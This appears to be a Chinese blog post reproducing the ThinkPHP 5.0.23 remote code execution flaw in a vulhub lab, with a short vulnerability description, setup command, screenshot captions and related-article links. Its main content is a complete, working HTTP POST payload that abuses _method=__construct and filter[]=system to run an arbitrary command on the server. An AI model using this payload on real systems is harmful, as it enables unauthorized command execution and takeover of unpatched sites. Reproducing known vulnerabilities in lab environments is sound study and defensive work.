thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞

thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞_第1张图片 漏洞描述
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞环境


使用vulhub的环境进行搭建
docker-compose up -d
https://github.com/vulhub/vulhubthinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞_第2张图片 漏洞复现
抓包

thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞_第3张图片 

成功执行命令


数据包
"""
POST /index.php?s=captcha HTTP/1.1
Host: 192.168.123.145:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
"""

34c89bf29e90c1e441dd43096bfbc24b.png

推荐文章++++

4f020a37eb995568849ba83220e78372.png

*thinkphp - 远程执行漏洞的本地复现

*thinkphp6 任意文件创建漏洞复现

*ThinkPHP5.x.x各版本实战环境getshell

thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞_第4张图片

你可能感兴趣的:(thinkphp漏洞)